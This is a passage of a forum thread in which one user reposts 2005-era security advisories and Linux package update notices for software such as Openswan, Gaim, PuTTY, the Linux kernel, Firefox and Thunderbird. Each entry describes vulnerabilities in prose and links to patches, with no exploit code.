Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
Microsoft Corporation: Windows XP Any version 
Novell, Inc.: Novell NetWare Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Ubuntu and Canonical: Ubuntu 4.10 
Various: Unix Any version 
Wind River Systems, Inc.: BSD Any version *

http://xforce.iss.net/xforce/xfdb/18922

eddie


----------



## eddie5659

Xelerance has released Openswan 1.0.9. You can download it by http or ftp. This version adds support for RFC 3947 - NAT-T, and a security for XAUTH (note: XAUTH is disabled by default)

Xelerance has released Openswan 2.3.0. You can download it by http or ftp. You can now also use any installer that supports 'repodata.xml', such as Yum, Apt-get, and up2date to easilly install openswan. This version adds KLIPS for 2.6 kernels, Aggressive Mode, IKE Mode Config support, Cisco VPN 3xxx client Interop

http://www.openswan.org/

This is explained in this Bugtraq email:

-----------------

Remote exploitation of a stack based buffer overflow vulnerability in 
Xelerance Corp.'s Openswan could allow attackers to execute arbitrary 
code.

The vulnerability specifically exists due to a lack of bounds checking 
in the pluto application when Openswan is compiled with XAUTH and PAM 
support. The get_internal_addresses() function in 
programs/pluto/xauth.c allocates a small character array and copies an 
overly long user controlled buffer into the array as seen below. The 
resulting stack overflow may be leveraged to execute arbitrary code 
with permissions of the pluto process.

Successful exploitation of the vulnerability can allow remote attackers 
to execute code with privileges of the pluto process. Exploitation in 
the wild will be limited due to the fact that Openswan would need to be 
compiled with XAUTH and PAM options enabled which are both disabled by 
default. In addition, exploitation occurs after an IKE Phase-1 Security 
Association (SA) has been established which requires authentication of 
a shared key and the supplied client certificate, further reducing the 
impact of this vulnerability.

IV. DETECTION

iDEFENSE has confirmed that Openswan 2.2.0 is vulnerable. All previous 
versions of Openswan also contain the vulnerable code.

----

The strange thing is, Idefense say its for version 2.2.0 and below. OpenSwan released the 2.3 version, so its best to get that one. Not sure why 1.0.9 is listed as newest 

eddie


----------



## eddie5659

- Apply Steve patch to fix buffer overlow #141761

*Product : Fedora Core 3
Name : kdepim
Version : 3.3.1
*

http://www.linuxsecurity.com/content/view/118175/102/

eddie


----------



## eddie5659

Xpdf is an X Window System based viewer for Portable Document Format (PDF) files. Xpdf is a small and efficient program which uses standard X fonts.

- fix handling CID font encodings in freetype >= 2.1.8 (bug #135066, 
#143948)
- set match as default psPaperSize #141131
- don't link against t1lib, use freetype2 for rendering

*Product : Fedora Core 3
Name : xpdf
Version : 3.00
Release : 10.3
*

http://www.linuxsecurity.com/content/view/118176/102/

eddie


----------



## eddie5659

The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc

*Product : Fedora Core 2
Name : kernel
Version : 2.6.10 
Release : 1.12_FC2 *

http://www.linuxsecurity.com/content/view/118177/102/

eddie


----------



## eddie5659

The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc.

*Product : Fedora Core 3
Name : kernel
Version : 2.6.10 
Release : 1.760_FC3 *

http://www.linuxsecurity.com/content/view/118178/102/

eddie


----------



## eddie5659

For the stable distribution (woody) this problem has been fixed in version 2.2.1-4.7. No other version of Python in woody is affected

*Package : python2.2
*

http://www.linuxsecurity.com/content/view/118182/100/

eddie


----------



## eddie5659

ELOG is a freely available open-source Web-based logbook program for Unix and Linux-based operating systems. ELOG versions 2.5.6 and earlier are vulnerable to a heap-based buffer overflow in the weblog application. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Data General: DG/UX Any version 
ELOG: ELOG 2.5.6 and earlier 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
Linux: Linux Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/19313

eddie


----------



## eddie5659

The toolchain-source, the GNU binutils and GNU C-Compiler (GCC) source code, in Debian Linux version 3.0 could allow a local attacker to launch a symlink attack. The toolchain-source creates insecure temporary files in the /tmp directory. A local attacker could use this vulnerability to create symbolic links from a temporary file to overwrite arbitrary files on the system with user privileges

*Platforms Affected:

Debian Project: Debian Linux 3.0 
*

http://xforce.iss.net/xforce/xfdb/19317

Regards

eddie


----------



## eddie5659

A bug in the way kioslave handles URL-encoded newline (%0a) characters before the FTP command was discovered. Because of this, it is possible that a specially crafted URL could be used to execute any ftp command on a remote server, or even send unsolicited email.

*Affected versions: 10.0, 10.1, Corporate 3.0
*

http://www.linuxsecurity.com/content/view/118369/106/

eddie


----------



## eddie5659

Problem Description:

New KDE packages are available to address various bugs. The details
are as follows.

Kdebase:

- fix klipper kde bug #75618
- fix konqueror kde bug #66361
- fix kfind kde bug #98423
- fix mozilla session managment

Kdenetwork:

- fix kopete kde bug #95804
- fix kget kde bug #92829
- fix kopete kde bug #96304

Kdepim:

- fix kmail header list empty
- fix kmail encrypted email
- fix certmanager aegypt issue 296
- fix kmail kde bug #98463
- fix kmail kde bug #56302
- fix kpgp kde bug #92619
- fix kmail kde bug #98715

Kdeutils:

- fix klaptop "do not allow to overwrite files outside /proc"
- fix kcalc kde bug #98522
- fix kwalleditor incorrect message error
- fix generate menu (kcmlirc) mdk bug #9775
- fix kloppy device name
- fix kdf kde bug #94774
- fix kgpg shredder icons
- fix klaptop: don't provide "kdeutils" bug found by Pascal Terjan

*Affected versions: 10.1
*

http://www.linuxsecurity.com/content/view/118370/106/

eddie


----------



## eddie5659

Previous updates to correct integer overflow issues affecting xpdf overlooked certain conditions when built for a 64 bit platform. (formerly CAN-2004-0888). This also affects applications that use embedded versions of xpdf. The updated packages are patched to deal with these issues.

*Affected versions: 10.0, 10.1, Corporate 3.0,
Corporate Server 2.1
*

http://www.linuxsecurity.com/content/view/118371/106/

eddie


----------



## eddie5659

A number of vulnerabilities were found

*Affected versions: 10.0, 10.1, Corporate 3.0,
Corporate Server 2.1*

http://www.linuxsecurity.com/content/view/118372/106/

eddie


----------



## eddie5659

Previous updates to correct integer overflow issues affecting xpdf overlooked certain conditions when built for a 64 bit platform. (formerly CAN-2004-0888). This also affects applications like tetex, that use embedded versions of xpdf. The updated packages are patched to deal with these issues.

*Affected versions: 10.0, 10.1, Corporate 3.0
*

http://www.linuxsecurity.com/content/view/118373/106/

eddie


----------



## eddie5659

Hiya

Gaim is an instant messenger application for Microsoft Windows and Linux-based operating systems. Gaim versions prior to 1.1.3 are vulnerable to a denial of service attack, caused by a vulnerability in the parsing of HTML. By sending specially-crafted HTML, a remote attacker could cause Gaim to crash.

*Platforms Affected:

Gaim Project: Gaim prior to 1.1.3 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows XP 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
*

http://xforce.iss.net/xforce/xfdb/19381

Regards

eddie


----------



## eddie5659

Hiya

Gaim is an instant messenger application for Microsoft Windows and Linux-based operating systems. Gaim versions prior to 1.1.3 are vulnerable to a denial of service attack, caused by a vulnerability in the parsing of SNAC packets. By sending a specially-crafted SNAC packet, a remote attacker could cause Gaim to enter into an infinite loop, resulting in a denial of service.

*Platforms Affected:

Gaim Project: Gaim prior to 1.1.3 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows XP 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
*

http://xforce.iss.net/xforce/xfdb/19380

Regards

eddie


----------



## eddie5659

gprostats, distributed with GProFTPD, is vulnerable to a format string vulnerability, potentially leading to the execution of arbitrary code

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-ftp/gproftpd < 8.1.9 >= 8.1.9
*

http://www.linuxsecurity.com/content/view/118383/104/

eddie


----------



## eddie5659

Updated package.

http://www.linuxsecurity.com/content/view/118384/100/

eddie


----------



## eddie5659

Updated kernel packages that fix several security issues are now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/118385/110/

eddie


----------



## eddie5659

This update fixes a number of annoying bugs in gamin especially the Desktop update problem in the GNOME environment that affected a number of users.

*Product : Fedora Core 3
Name : gamin
Version : 0.0.24
*

http://www.linuxsecurity.com/content/view/118386/102/

eddie


----------



## eddie5659

gFTP is vulnerable to directory traversal attacks, possibly leading to the creation or overwriting of arbitrary files.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-ftp/gftp < 2.0.18-r1 >= 2.0.18-r1

*

http://www.linuxsecurity.com/content/view/118388/104/

eddie


----------



## eddie5659

Ulog-php is a firewall log interface developed in PHP for Unix and Linux-based operating systems. Ulog-php versions prior to 1.0 are vulnerable to SQL injection. By sending a specially-crafted URL request to the host.php, port.php, or index.php script containing SQL code, a remote attacker could obtain sensitive information and add, modify or delete data in the backend database.

*Platforms Affected:

Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
INL: Ulog-php prior to 1.0 
Linux: Linux Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/19400

eddie


----------



## eddie5659

PuTTY is a Telnet/SSH (Secure Shell) client for Microsoft Windows and Unix-based operating systems. PuTTY versions prior to 0.57 are vulnerable to an integer buffer overflow in the 'fxp_readdir_recv function in the 'sftp.c'. By sending a specially-crafted response to the 'FXP_READDIR' command, a remote attacker could overflow a buffer and execute arbitrary code on the system

*Platforms Affected:

Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows XP 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
Santa Cruz Operation, Inc.: SCO Unix Any version 
Simon Tatham: PuTTY prior to 0.57 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/19402

Regards

eddie


----------



## eddie5659

uim is a multilingual input library running on Unix-based operating systems. uim versions prior to 0.4.5.1 could allow a local attacker to gain elevated privileges, caused by a vulnerability with trusted information in the environment variables. If the 'immodule for Qt' is enabled, a local attacker could use this vulnerability to gain elevated privileges on the system, once the libuim is linked with an application that is running setuid/setgid.

*Platforms Affected:

Data General: DG/UX Any version 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
Linux: Linux Any version 
MoinMoin: uim prior to 0.4.5.1 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/19397

eddie


----------



## eddie5659

fallback-reboot versions prior to 0.995 are vulnerable to a denial of service attack, caused by an unknown error when daemon status is written to a potentially non-existent terminal. A local attacker can exploit this vulnerability to cause a denial of service.

*Platforms Affected:

Dan (unknown): fallback-reboot prior to 0.995 
Linux: Linux Any version 
*

http://xforce.iss.net/xforce/xfdb/19432

eddie


----------



## eddie5659

Updated imap packages to correct a security vulnerability in CRAM-MD5 authentication are now available for Red Hat Enterprise Linux 3. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/118418/110/

eddie


----------



## eddie5659

This update fixes one-byte buffer overruns in the cyrus-imapd IMAP server package.

*Affected products: 8.2, 9.0, 9.1, 9.2
SUSE Linux Enterprise Server 8, 9
*

http://www.linuxsecurity.com/content/view/118423/112/

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 3
Name : gimp-help
Version : 2
Release : 0.1.0.7.0.fc3.1
*

http://www.linuxsecurity.com/content/view/118424/102/

eddie


----------



## eddie5659

Takumi ASAKI discovered that uim always trusts environment variables which can allow a local attacker to obtain elevated privileges when libuim is linked against an suid/sgid application. This problem is only exploitable in 'immodule for Qt' enabled Qt applications. The updated packages are patched to fix the problem.

*Affected versions: 10.1
*

http://www.linuxsecurity.com/content/view/118425/106/

eddie


----------



## eddie5659

The squid developers discovered that a remote attacker could cause squid to crash via certain DNS responses. The updated packages are patched to fix the problem.

*Affected versions: 10.0, 10.1, 9.2, Corporate 3.0,
Corporate Server 2.1
*

http://www.linuxsecurity.com/content/view/118426/106/

eddie


----------



## eddie5659

LuxMan is a game for Linux-based operating systems. LuxMan version 0.41-17.1 included with Debian GNU/Linux 3.0 could allow a local attacker to execute arbitrary code on the system, caused by an unknown buffer overflow. A local attacker could exploit this vulnerability to execute arbitrary commands on the system with root privileges.

*Platforms Affected:

Debian Project: Debian Linux 3.0 
*

http://xforce.iss.net/xforce/xfdb/19680

eddie


----------



## eddie5659

Linux Kernel versions 2.6 through 2.6.11 are vulnerable to an integer overflow, caused by improper bounds checking of user-supplied input in the 'sys_epoll_wait' function in the eventpoll.c. A local attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with elevated privileges

*Platforms Affected:

kernel.org: Linux kernel 2.6 through 2.6.11 
Linux: Linux Any version 
Ubuntu and Canonical: Ubuntu 4.10 
*

http://xforce.iss.net/xforce/xfdb/19701

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 3
Name : evolution-data-server
Version : 1.0.4
*

http://www.linuxsecurity.com/content/view/118629/102/

eddie


----------



## eddie5659

Updated package

*Product : Fedora Core 3
Name : evolution-connector
Version : 2.0.4
*

http://www.linuxsecurity.com/content/view/118631/102/

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 3
Name : evolution
Version : 2.0.4
*

http://www.linuxsecurity.com/content/view/118630/102/

eddie


----------



## eddie5659

Linux Kernel versions prior to 2.6.12-rc1 are vulnerable to a denial of service attack. A remote authenticated attacker with access to the SCSI tape device could send commands to cause a denial of service.

*Platforms Affected:

Linux: Linux Any version 
The Linux Kernel Archives: Linux Kernel prior to 2.6.12-rc1 *

http://xforce.iss.net/xforce/xfdb/19739

eddie


----------



## eddie5659

Linux Kernel versions prior to 2.6.12-rc1 are vulnerable to unspecified vulnerabilities in the ISO9660 filesystem handler, including the Rock Ridge and Juliet extensions. A remote attacker could send a specially-crafted filesystem to cause a denial of service or execute arbitrary code on the system.

*Platforms Affected:

Linux: Linux Any version 
The Linux Kernel Archives: Linux Kernel prior to 2.6.12-rc1 
*

http://xforce.iss.net/xforce/xfdb/19741

eddie


----------



## eddie5659

Linux Kernel versions prior to 2.6.12-rc1 are vulnerable to an unspecified vulnerability, caused by improper validation of the ndigis argument of new routes in the ROSE.

*Platforms Affected:

Linux: Linux Any version 
The Linux Kernel Archives: Linux Kernel prior to 2.6.12-rc1 
*

http://xforce.iss.net/xforce/xfdb/19738

eddie


----------



## eddie5659

phpSysInfo is a freely available PHP Script that displays system information for Linux-based operating systems. phpSysInfo version 2.3 and possibly other versions could allow a remote attacker to obtain sensitive information. A remote attacker could send a specially-crafted URL to the specific scripts to cause the phpSysInfo to return an error that discloses the full installation path

*Platforms Affected:

Linux: Linux Any version 
Uriah Welcome [email protected]: phpSysInfo 2.3 
*

http://xforce.iss.net/xforce/xfdb/19808

eddie


----------



## eddie5659

phpSysInfo is a freely available PHP Script that displays system information for Linux-based operating systems. phpSysInfo version 2.3 and possibly other versions are vulnerable to cross-site scripting, caused by improper validation of user-supplied input. If the register_globals is enabled, a remote attacker could embed malicious script in the 'sensor_program' parameter in a URL request to the index.php or system_footer.php scripts, which would be executed in the victim's Web browser within the security context of the hosting site, once the link is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

*Platforms Affected:

Linux: Linux Any version 
Uriah Welcome [email protected]: phpSysInfo 2.3 *

http://xforce.iss.net/xforce/xfdb/19807

eddie


----------



## eddie5659

Pretty pointless creating an April one now, so adding here 

RealNetworks, Inc. has addressed recently discovered a security vulnerability that offered the potential for an attacker to run arbitrary or malicious code on a customer's machine. RealNetworks has received no reports of machines compromised as a result of the now-remedied vulnerabilities. RealNetworks takes all security vulnerabilities very seriously.

The specific exploit was:

To fashion a malicious RAM file to cause a buffer overflow which could have allowed an attacker to execute arbitrary code on a customer's machine.

*Affected Software

Linux RealPlayer 10 (10.0.0 - 3)
Helix Player (10.0.0 - 3)*

http://service.real.com/help/faq/security/050419_player/EN/

eddie


----------



## eddie5659

Hiya

Bit behind, but going to start this again 

A bug was found in the way Firefox handled synthetic events. It is possible
that Web content could generate events such as keystrokes or mouse clicks
that could be used to steal data or execute malicious JavaScript code. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned
the name CAN-2005-2260 to this issue.

A bug was found in the way Firefox executed Javascript in XBL controls. It
is possible for a malicious webpage to leverage this vulnerability to
execute other JavaScript based attacks even when JavaScript is disabled.
(CAN-2005-2261)

A bug was found in the way Firefox set an image as the desktop wallpaper.
If a user chooses the "Set As Wallpaper..." context menu item on a
specially crafted image, it is possible for an attacker to execute
arbitrary code on a victim's machine. (CAN-2005-2262)

A bug was found in the way Firefox installed its extensions. If a user can
be tricked into visiting a malicious webpage, it may be possible to obtain
sensitive information such as cookies or passwords. (CAN-2005-2263)

A bug was found in the way Firefox handled the _search target. It is
possible for a malicious website to inject JavaScript into an already open
webpage. (CAN-2005-2264)

A bug was found in the way Firefox handled certain Javascript functions. It
is possible for a malicious web page to crash the browser by executing
malformed Javascript code. (CAN-2005-2265)

A bug was found in the way Firefox handled multiple frame domains. It is
possible for a frame as part of a malicious web site to inject content into
a frame that belongs to another domain. This issue was previously fixed as
CAN-2004-0718 but was accidentally disabled. (CAN-2005-1937)

A bug was found in the way Firefox handled child frames. It is possible for
a malicious framed page to steal sensitive information from its parent
page. (CAN-2005-2266)

A bug was found in the way Firefox opened URLs from media players. If a
media player opens a URL that is JavaScript, JavaScript is executed
with access to the currently open webpage. (CAN-2005-2267)

A design flaw was found in the way Firefox displayed alerts and prompts.
Alerts and prompts were given the generic title [JavaScript Application]
which prevented a user from knowing which site created them. (CAN-2005-2268)

A bug was found in the way Firefox handled DOM node names. It is possible
for a malicious site to overwrite a DOM node name, allowing certain
privileged chrome actions to execute the malicious JavaScript. (CAN-2005-2269)

A bug was found in the way Firefox cloned base objects. It is possible for
Web content to navigate up the prototype chain to gain access to privileged
chrome objects. (CAN-2005-2270)

*Product : Fedora Core 3
Name : firefox
Version : 1.0.6 *

http://www.linuxsecurity.com/content/view/119831/102/

Regards

eddie


----------



## eddie5659

A bug was found in the way Thunderbird handled anonymous functions during
regular expression string replacement. It is possible for a malicious HTML
mail to capture a random block of client memory. The Common
Vulnerabilities and Exposures project has assigned this bug the name
CAN-2005-0989.

A bug was found in the way Thunderbird validated several XPInstall related
JavaScript objects. A malicious HTML mail could pass other objects to the
XPInstall objects, resulting in the JavaScript interpreter jumping to
arbitrary locations in memory. (CAN-2005-1159)

A bug was found in the way the Thunderbird privileged UI code handled DOM
nodes from the content window. An HTML message could install malicious
JavaScript code or steal data when a user performs commonplace actions such
as clicking a link or opening the context menu. (CAN-2005-1160)

A bug was found in the way Thunderbird executed JavaScript code. JavaScript
executed from HTML mail should run with a restricted access level,
preventing dangerous actions. It is possible that a malicious HTML mail
could execute JavaScript code with elevated privileges, allowing access to
protected data and functions. (CAN-2005-1532)

A bug was found in the way Thunderbird executed Javascript in XBL controls.
It is possible for a malicious HTML mail to leverage this vulnerability to
execute other JavaScript based attacks even when JavaScript is disabled.
(CAN-2005-2261)

A bug was found in the way Thunderbird handled certain Javascript
functions. It is possible for a malicious HTML mail to crash the client by
executing malformed Javascript code. (CAN-2005-2265)

A bug was found in the way Thunderbird handled child frames. It is possible
for a malicious framed HTML mail to steal sensitive information from its
parent frame. (CAN-2005-2266)

A bug was found in the way Thunderbird handled DOM node names. It is
possible for a malicious HTML mail to overwrite a DOM node name, allowing
certain privileged chrome actions to execute the malicious JavaScript.
(CAN-2005-2269)

A bug was found in the way Thunderbird cloned base objects. It is possible
for HTML content to navigate up the prototype chain to gain access to
privileged chrome objects. (CAN-2005-2270)

*Product : Fedora Core 3
Name : thunderbird
Version : 1.0.6 *

http://www.linuxsecurity.com/content/view/119832/102/

Regards

eddie


----------



## eddie5659

A bug was found in the way Firefox handled synthetic events. It is possible
that Web content could generate events such as keystrokes or mouse clicks
that could be used to steal data or execute malicious JavaScript code. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned
the name CAN-2005-2260 to this issue.

A bug was found in the way Firefox executed Javascript in XBL controls. It
is possible for a malicious webpage to leverage this vulnerability to
execute other JavaScript based attacks even when JavaScript is disabled.
(CAN-2005-2261)

A bug was found in the way Firefox set an image as the desktop wallpaper.
If a user chooses the "Set As Wallpaper..." context menu item on a
specially crafted image, it is possible for an attacker to execute
arbitrary code on a victim's machine. (CAN-2005-2262)

A bug was found in the way Firefox installed its extensions. If a user can
be tricked into visiting a malicious webpage, it may be possible to obtain
sensitive information such as cookies or passwords. (CAN-2005-2263)

A bug was found in the way Firefox handled the _search target. It is
possible for a malicious website to inject JavaScript into an already open
webpage. (CAN-2005-2264)

A bug was found in the way Firefox handled certain Javascript functions. It
is possible for a malicious web page to crash the browser by executing
malformed Javascript code. (CAN-2005-2265)

A bug was found in the way Firefox handled multiple frame domains. It is
possible for a frame as part of a malicious web site to inject content into
a frame that belongs to another domain. This issue was previously fixed as
CAN-2004-0718 but was accidentally disabled. (CAN-2005-1937)

A bug was found in the way Firefox handled child frames. It is possible for
a malicious framed page to steal sensitive information from its parent
page. (CAN-2005-2266)

A bug was found in the way Firefox opened URLs from media players. If a
media player opens a URL that is JavaScript, JavaScript is executed
with access to the currently open webpage. (CAN-2005-2267)

A design flaw was found in the way Firefox displayed alerts and prompts.
Alerts and prompts were given the generic title [JavaScript Application]
which prevented a user from knowing which site created them. (CAN-2005-2268)

A bug was found in the way Firefox handled DOM node names. It is possible
for a malicious site to overwrite a DOM node name, allowing certain
privileged chrome actions to execute the malicious JavaScript. (CAN-2005-2269)

A bug was found in the way Firefox cloned base objects. It is possible for
Web content to navigate up the prototype chain to gain access to privileged
chrome objects. (CAN-2005-2270)

*Product : Fedora Core 4
Name : firefox
Version : 1.0.6 *

http://www.linuxsecurity.com/content/view/119833/102/

Regards

eddie


----------



## eddie5659

A bug was found in the way Thunderbird handled anonymous functions during
regular expression string replacement. It is possible for a malicious HTML
mail to capture a random block of client memory. The Common
Vulnerabilities and Exposures project has assigned this bug the name
CAN-2005-0989.

A bug was found in the way Thunderbird validated several XPInstall related
JavaScript objects. A malicious HTML mail could pass other objects to the
XPInstall objects, resulting in the JavaScript interpreter jumping to
arbitrary locations in memory. (CAN-2005-1159)

A bug was found in the way the Thunderbird privileged UI code handled DOM
nodes from the content window. An HTML message could install malicious
JavaScript code or steal data when a user performs commonplace actions such
as clicking a link or opening the context menu. (CAN-2005-1160)

A bug was found in the way Thunderbird executed JavaScript code. JavaScript
executed from HTML mail should run with a restricted access level,
preventing dangerous actions. It is possible that a malicious HTML mail
could execute JavaScript code with elevated privileges, allowing access to
protected data and functions. (CAN-2005-1532)

A bug was found in the way Thunderbird executed Javascript in XBL controls.
It is possible for a malicious HTML mail to leverage this vulnerability to
execute other JavaScript based attacks even when JavaScript is disabled.
(CAN-2005-2261)

A bug was found in the way Thunderbird handled certain Javascript
functions. It is possible for a malicious HTML mail to crash the client by
executing malformed Javascript code. (CAN-2005-2265)

A bug was found in the way Thunderbird handled child frames. It is possible
for a malicious framed HTML mail to steal sensitive information from its
parent frame. (CAN-2005-2266)

A bug was found in the way Thunderbird handled DOM node names. It is
possible for a malicious HTML mail to overwrite a DOM node name, allowing
certain privileged chrome actions to execute the malicious JavaScript.
(CAN-2005-2269)

A bug was found in the way Thunderbird cloned base objects. It is possible
for HTML content to navigate up the prototype chain to gain access to
privileged chrome objects. (CAN-2005-2270)

*Product : Fedora Core 4
Name : thunderbird
Version : 1.0.6 *

http://www.linuxsecurity.com/content/view/119834/102/

Regards

eddie


----------



## eddie5659

Update to MySQL 4.1.12 (includes a low-impact security fix, see bz#158689). Repair some issues in openssl support. Re-enable the old ISAM table type.

*Product : Fedora Core 4
Name : mysql
Version : 4.1.12 *

http://www.linuxsecurity.com/content/view/119835/102/

Regards

eddie


----------



## eddie5659

FreeBSD version 5.x could allow a local attacker to gain elevated privileges caused by improper validation of user-supplied input in the node type parameter when creating a device. If a local attacker running a jailed process attempts to access the hidden devfs device nodes that are mounted in the jail, the device nodes will be created with normal default access permissions. An attacker could use this to obtain sensitive information or possibly gain elevated privileges on the system

*Platforms Affected:

FreeBSD Project: FreeBSD 5.x 
*

http://xforce.iss.net/xforce/xfdb/21451

Regards

eddie


----------



## eddie5659

Fetchmail is a remote mail-retrieval and forwarding utility for Unix that uses the POP3 and IMAP protocols. Fetchmail versions 6.2.0, 6.2.5, 6.2.5.1, and possibly earlier versions, are vulnerable to a stack-based buffer overflow caused by improper bounds checking of user-supplied input when handling UIDL responses. By persuading a user to connect to a malicious POP3 server, a remote attacker could overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Apple Computer, Inc.: Mac OS Any version 
Cisco Systems, Inc.: Cisco IOS Any version 
Data General: DG/UX Any version 
Eric S. Raymond : Fetchmail 6.2.0 
Eric S. Raymond : Fetchmail 6.2.5 
Eric S. Raymond : Fetchmail 6.2.5.1 
Hewlett-Packard Company: Compaq Tru64 UNIX Any version 
Hewlett-Packard Company: HP-UX Any version 
IBM: AIX Any version 
IBM: OS/2 Any version 
Linux: Linux Any version 
Microsoft Corporation: Windows 95 
Microsoft Corporation: Windows 98 
Microsoft Corporation: Windows 98 Second Edition 
Microsoft Corporation: Windows Me 
Microsoft Corporation: Windows XP 
Microsoft Corporation: Windows 2000 Any version 
Microsoft Corporation: Windows 2003 Any version 
Microsoft Corporation: Windows NT 4.0 
Novell, Inc.: Novell NetWare Any version 
Santa Cruz Operation, Inc.: SCO Unix Any version 
SGI: IRIX Any version 
Sun Microsystems: Solaris Any version 
Wind River Systems, Inc.: BSD Any version 
*

http://xforce.iss.net/xforce/xfdb/21479

Regards

eddie


----------



## eddie5659

This update contains the latest release of Subversion. Subversion 1.2 adds support for locking (reserved checkouts), and includes many bug fixes and improvements.

*Product : Fedora Core 4
Name : subversion
Version : 1.2.1 *

http://www.linuxsecurity.com/content/view/119866/102/

Regards

eddie


----------



## eddie5659

Fix zlib buffer overflow.

*Product : Fedora Core 3
Name : zlib
Version : 1.2.1.2 *

http://www.linuxsecurity.com/content/view/119868/102/

Regards

eddie


----------



## eddie5659

Multiple integer overflow flaws were found in the way Kopete processes Gadu-Gadu messages. A remote attacker could send a specially crafted Gadu-Gadu message which would cause Kopete to crash or possibly execute arbitrary code

*Product : Fedora Core 4
Name : kdenetwork
Version : 3.4.1 *

http://www.linuxsecurity.com/content/view/119869/102/

Regards

eddie


----------



## eddie5659

Paul Szabo discovered another vulnerability in the File:ath::rmtree function of perl, the popular scripting language. When a process is deleting a directory tree, a different user could exploit a race condition to create setuid binaries in this directory tree, provided that he already had write permissions in any subdirectory of that tree. Perl interpreter would cause a segmentation fault when environment changes during the runtime. Code in lib/FindBin contained a regression which caused problems with MRTG software package.

*Product : Fedora Core 3
Name : perl
Version : 5.8.5 *

http://www.linuxsecurity.com/content/view/119871/102/

Regards

eddie


----------



## eddie5659

Multiple integer overflow flaws were found in the way Kopete processes Gadu-Gadu messages. A remote attacker could send a specially crafted Gadu-Gadu message which would cause Kopete to crash or possibly execute arbitrary code.

*Product : Fedora Core 3
Name : kdenetwork
Version : 3.3.1*

http://www.linuxsecurity.com/content/view/119870/102/

Regards

eddie


----------



## eddie5659

Kopete is vulnerable to several input validation vulnerabilities which may lead to execution of arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 kde-base/kdenetwork < 3.4.1-r1 >= 3.4.1-r1
*>= 3.3.2-r2
2 kde-base/kopete < 3.4.1-r1 >= 3.4.1-r1
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------

*

http://www.linuxsecurity.com/content/view/119892/104/

Regards

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : dlm-kernel
Version : 2.6.11.5 *

http://www.linuxsecurity.com/content/view/119895/102/

Regards

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : gnbd-kernel
Version : 2.6.11.2 *

http://www.linuxsecurity.com/content/view/119894/102/

Regards

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : cman-kernel
Version : 2.6.11.5 *

http://www.linuxsecurity.com/content/view/119896/102/

Regards

eddie


----------



## eddie5659

Updated package.

*Product : Fedora Core 4
Name : GFS-kernel
Version : 2.6.11.8 *

http://www.linuxsecurity.com/content/view/119897/102/

Regards

